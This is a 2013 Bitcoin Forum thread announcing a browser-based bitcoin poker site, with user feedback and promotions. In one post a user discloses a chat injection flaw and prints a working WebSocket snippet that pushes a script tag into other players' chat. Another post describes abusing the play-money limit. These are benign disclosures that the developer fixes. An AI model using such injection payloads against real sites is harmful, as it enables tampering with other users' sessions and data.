Bitcoin Forum
May 04, 2024, 11:52:28 PM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: [1] 2 3 »  All
  Print  
Author Topic: Boot52 instant play poker, no downloads or registration!  (Read 3841 times)
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 04, 2013, 06:59:14 PM
Last edit: August 04, 2013, 10:01:37 PM by boot52
 #1

Hi! Check out the new poker site I created: http://boot52.nl. Boot52 offers free online poker right from your browser, no downloads or registration required. And of course, bitcoin tables are also available for those who prefer a little more excitement!

My goal was to create an 'instant gratification' poker site where even non-bitcoiners could get started right away with play money. My hope is to get some of the recreational players out there involved in bitcoin. Some features:

* Anonymous: no annoying registration forms to fill out.
* Instant play: just click play!
* Works on most mobile devices (tested on iPad, FireFox, and Chrome)
* Built with HTML5 WebSockets and CSS3. No flash or Java plugins required.
* Nearly instant deposits and withdraws.

Texas Hold'em ring games are currently offered, but the software is still under active development so please let me know what features you'd like to see in future! Pot-Limit Omaha, Sit-N-Go's, and 'provably fair shuffling' are next on my todo list, but I'm open to other ideas if they're popular enough. https://boot52.nl
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 04, 2013, 07:39:59 PM
 #2

Sanitize userinput.

I could do evil stuff (like read out other peoples cards), instead I did this:

Code:
ws = new WebSocket('wss://boot52.nl/holdem/' + getSock());
ws.onmessage = function(e){
  ws.send(JSON.stringify({chat: ["<script>ws=new WebSocket('wss://boot52.nl/holdem/1');ws.onmessage=function(e){ws.send('{\"chat\":[\"LEL\"]}');};</script>"]}));
  ws.close();
};

BEEP BEP
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 04, 2013, 09:25:39 PM
 #3

Good catch vlees! I added a regex to strip out nonalphanumeric characters from user input, which should prevent this type of nefarious activity in the future.  Send me your user name on the site and I'll add some chips to your account (which you can withdraw immediately if you want).  

Great to catch these bugs now before any real money is on the line. Do your worst!
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 04, 2013, 11:02:48 PM
Last edit: August 04, 2013, 11:28:02 PM by vlees
 #4

Send me your user name on the site

vlees

Also, can I login as this user again on another computer or is that account lost as soon as I delete my cookies?
EDIT: NVM, found the secret link.

EDIT2: When you create a new account the playmoney is set to 2000. According to the FAQ you can always update the playmoney and trying to set it to 1000000 gives an error: must be 2000 or lower. So I try 2000, and it resets my money to 800...

EDIT3: when you check my account you see I have an insane amount of play chips. I was unable to add them to the table at once and had to do so in steps of 9000000.

EDIT4: With your regex you filter out spaces in the chat, which is kinda annoying.

BEEP BEP
Lizmay
Newbie
*
Offline Offline

Activity: 13
Merit: 0


View Profile
August 05, 2013, 01:51:11 AM
 #5

Nice page, layout was great on my IPad.  I didn't make any fat finger mistakes, like normal.  I love being able to play right away and not having to create an account without a test run.   I'll be back for sure.
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 05, 2013, 02:46:16 AM
 #6

vlees
Added 500 chips to your account available for withdraw anytime!

EDIT2: When you create a new account the playmoney is set to 2000. According to the FAQ you can always update the playmoney and trying to set it to 1000000 gives an error: must be 2000 or lower. So I try 2000, and it resets my money to 800...
Fixed. Max play money was set to 100 x big_blind, or 800 at 4/8 tables and 2000 at 10/20 tables. I agree this is confusing and now I have it set to simply 2000.

EDIT3: when you check my account you see I have an insane amount of play chips. I was unable to add them to the table at once and had to do so in steps of 9000000.
Funny, very funny. But you make a good point. I've modified the code to never allow more than 2000 in play money.

EDIT4: With your regex you filter out spaces in the chat, which is kinda annoying.
Fixed. Regex now allows white spaces in the chat. Looks like I needed something better than s/\W//g Smiley

Thanks for all the great feedback!
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 05, 2013, 11:33:18 PM
 #7

Nice. This site needs players though. So some sealsofclubs people should come here and play, without a registration (definitely the one thing I always hated at poker sites).

EDIT: Had a nice for-money game today. What I noticed: there is no betting before the cards are dealt. Something I remember to be in the Texas Hold'em rules (long time ago that I played that game (for money) so I'm not sure).

BEEP BEP
Hfleer
Sr. Member
****
Offline Offline

Activity: 448
Merit: 250


Changing avatars is currently not possible.


View Profile
August 06, 2013, 12:32:20 PM
 #8

Hi! Check out the new poker site I created: http://boot52.nl. Boot52 offers free online poker right from your browser, no downloads or registration required. And of course, bitcoin tables are also available for those who prefer a little more excitement!

My goal was to create an 'instant gratification' poker site where even non-bitcoiners could get started right away with play money. My hope is to get some of the recreational players out there involved in bitcoin. Some features:

* Anonymous: no annoying registration forms to fill out.
* Instant play: just click play!
* Works on most mobile devices (tested on iPad, FireFox, and Chrome)
* Built with HTML5 WebSockets and CSS3. No flash or Java plugins required.
* Nearly instant deposits and withdraws.

Texas Hold'em ring games are currently offered, but the software is still under active development so please let me know what features you'd like to see in future! Pot-Limit Omaha, Sit-N-Go's, and 'provably fair shuffling' are next on my todo list, but I'm open to other ideas if they're popular enough. https://boot52.nl

Another poker game site.  I might check this out, but I haven't been a player for a long time.  That's pretty good if it works with mobile devices, not sure how many others have that yet.  Good luck with this.

█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
▓▓▓▓▓  BIT-X.comvvvvvvvvvvvvvvi
→ CREATE ACCOUNT 
▓▓▓▓▓
█████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 06, 2013, 03:41:35 PM
Last edit: August 06, 2013, 06:55:00 PM by boot52
 #9

Nice. This site needs players though. So some sealsofclubs people should come here and play, without a registration (definitely the one thing I always hated at poker sites).
Yeah, traffic is always a big issue with new poker sites. It's not much fun with no one to play against. Sad One thing I learned from doing market research is that the 'play money' market alone is pretty big. Zynga gets more traffic than every other poker site out there with the exception of Pokerstars.  It would be a huge win for this site and bitcoin in general if we could get just a tiny fraction of that. So my strategy right now is to mainly go after the 'play money' market, but I'd be delighted to get a few seasoned bitcoiners as well! What I see in the bitcoin community right now is just the same people swapping coins back and forth over and over again.  So I think it is imperative to bring in a little "fresh blood." That's my goal with boot52.

EDIT: Had a nice for-money game today. What I noticed: there is no betting before the cards are dealt. Something I remember to be in the Texas Hold'em rules (long time ago that I played that game (for money) so I'm not sure).
Glad you liked it. I think you are the first 'real money' player to try out the site that isn't one of my relatives Smiley
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 06, 2013, 03:47:54 PM
 #10

Also people tend to forget they are on the site.

Maybe auto leave the table after doing nothing for a round and play sounds.
Currently getting 7 free chips per round (once a minute) on table 5.

BEEP BEP
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 06, 2013, 04:22:21 PM
Last edit: August 06, 2013, 05:34:32 PM by boot52
 #11

Currently getting 7 free chips per round (once a minute) on table 5.
You must be playing vs. 'LuckyLiz'. That's my girlfriend. She's not much of a poker player, but she's doing her part to make sure there's always someone on the site to play against. Note to sharks: you should have a pretty easy time picking up chips vs 'LuckyLiz' (small stakes, though).  The connection will timeout after 300 seconds of inactivity, but I may decrease that if I see too many relatives "blinding out" on the real money tables.

Another poker game site.  I might check this out, but I haven't been a player for a long time.  That's pretty good if it works with mobile devices, not sure how many others have that yet.  Good luck with this.
Thanks. HTML5 WebSockets was an obvious technology choice since it works on almost every mobile device out there. I'm not sure why so many sites still insist on using Adobe Flash. It's buggy and not very well supported by Apple.
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 06, 2013, 04:25:18 PM
 #12

and not very well supported by Apple.

And Android, and Linux, and Windows (Phone), and Tizen, and Symbian, and ....
Well, where does it actually work properly?

BEEP BEP
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 07, 2013, 06:21:37 PM
 #13

Adobe Flash: it may be slow, but it sure is hard to use.
vlees
Full Member
***
Offline Offline

Activity: 196
Merit: 100



View Profile
August 11, 2013, 09:40:41 AM
 #14

Site offline and my account with a balance on it was removed?

BEEP BEP
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 11, 2013, 01:03:03 PM
 #15

Whoops! Site back now, sorry for the inconvenience. Anyone with coins on the site just got a little bonus added to their account.
What happened was that I 'fixed' a few minor bugs dealing with WebSocket disconnects yesterday, causing unexpected problems.

Sound effects have also been added per your suggestion, which should make the user experience a lot more fun. As always, I'm interested hearing feedback on how the site could be improved, especially from mobile device users .. since I don't always take the time to test things out properly on the iThings and Androids.

Boot52 Poker is back!
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 17, 2013, 08:42:24 PM
 #16

Hey! Boot52 here with a mind-blowing promotion fer y'all. This one is good, so perk up your ears on this. This Sunday (tomorrow) from 12 noon to midnight EST, FoldBot will be playing on table 5! (http://boot52.nl/id/5)

What's FoldBot? FoldBot is a poker robot I designed with one very simple instruction: fold. That's all FoldBot does and it does it well. You bet, FoldBot folds. Every time. I guarantee it.       

Heads-up against FoldBot is basically just free money. More than one player and things get interesting. Here's how it works. If nobody raises preflop, FoldBot is programmed to lose exactly one big blind per hand. It just puts dead money in the pot.  However, if somebody does raise preflop and FoldBot isn't in the hand yet, then FoldBot will fold without putting anything in the pot. Makes it interesting, no?

Why are we giving away coins like this? Let's just call this what it is: a bribe.
Boot52 needs players and deals like this are a lot cheaper than buying banner ads and props. A lot more interesting too, no?

So git the hitch out of your get-along and mosey on over to Boot52!
The site link again is http://boot52.nl
FanEagle
Legendary
*
Offline Offline

Activity: 2856
Merit: 1114


Leading Crypto Sports Betting & Casino Platform


View Profile
August 17, 2013, 09:40:42 PM
 #17

maybe you should do something like:
Every user of bitcointalk that writes here his nickname receive x chips, if caught in multi account you will not receive any more money, something like that.

..Stake.com..   ▄████████████████████████████████████▄
   ██ ▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄ ██  ▄████▄
   ██ ▀▀▀▀▀▀▀▀▀▀ ██████████ ▀▀▀▀▀▀▀▀▀▀ ██  ██████
   ██ ██████████ ██      ██ ██████████ ██   ▀██▀
   ██ ██      ██ ██████  ██ ██      ██ ██    ██
   ██ ██████  ██ █████  ███ ██████  ██ ████▄ ██
   ██ █████  ███ ████  ████ █████  ███ ████████
   ██ ████  ████ ██████████ ████  ████ ████▀
   ██ ██████████ ▄▄▄▄▄▄▄▄▄▄ ██████████ ██
   ██            ▀▀▀▀▀▀▀▀▀▀            ██ 
   ▀█████████▀ ▄████████████▄ ▀█████████▀
  ▄▄▄▄▄▄▄▄▄▄▄▄███  ██  ██  ███▄▄▄▄▄▄▄▄▄▄▄▄
 ██████████████████████████████████████████
▄▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄
█  ▄▀▄             █▀▀█▀▄▄
█  █▀█             █  ▐  ▐▌
█       ▄██▄       █  ▌  █
█     ▄██████▄     █  ▌ ▐▌
█    ██████████    █ ▐  █
█   ▐██████████▌   █ ▐ ▐▌
█    ▀▀██████▀▀    █ ▌ █
█     ▄▄▄██▄▄▄     █ ▌▐▌
█                  █▐ █
█                  █▐▐▌
█                  █▐█
▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀█
▄▄█████████▄▄
▄██▀▀▀▀█████▀▀▀▀██▄
▄█▀       ▐█▌       ▀█▄
██         ▐█▌         ██
████▄     ▄█████▄     ▄████
████████▄███████████▄████████
███▀    █████████████    ▀███
██       ███████████       ██
▀█▄       █████████       ▄█▀
▀█▄    ▄██▀▀▀▀▀▀▀██▄  ▄▄▄█▀
▀███████         ███████▀
▀█████▄       ▄█████▀
▀▀▀███▄▄▄███▀▀▀
..PLAY NOW..
pand70
Sr. Member
****
Offline Offline

Activity: 476
Merit: 250



View Profile
August 17, 2013, 09:43:17 PM
 #18

Good Job but still you need a lot of work + a lot of promotions to make it happen.  Wink

montana
Newbie
*
Offline Offline

Activity: 46
Merit: 0


View Profile
August 18, 2013, 12:50:05 PM
Last edit: August 18, 2013, 01:30:44 PM by montana
 #19

Hello...

Just had time for a quick pass with it this morning.  um... please make handy a sound-kill switch!

Looks fun... but no players except one in the freechips area

HS

added later:  No player chat interface makes quite a difference.  Sometimes when I have the other player all in, and te next card is dealt, it offers me the chance to bet check or fold, instead of just finishing the game out.  It did not do that on at least one occassion though.


16FmKafYobMV6qoUkYzowBtNaUgY7Fegta
boot52 (OP)
Newbie
*
Offline Offline

Activity: 42
Merit: 0



View Profile WWW
August 18, 2013, 03:46:32 PM
 #20

maybe you should do something like:
Every user of bitcointalk that writes here his nickname receive x chips, if caught in multi account you will not receive any more money, something like that.

Good point! Anyone who wants to take a whack at FoldBot this afternoon, just post your boot52 handle right here and I'll credit your account with a few chips. To qualify, you must be a forum member in good standing and you can't be a newbie.
Pages: [1] 2 3 »  All
  Print  
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!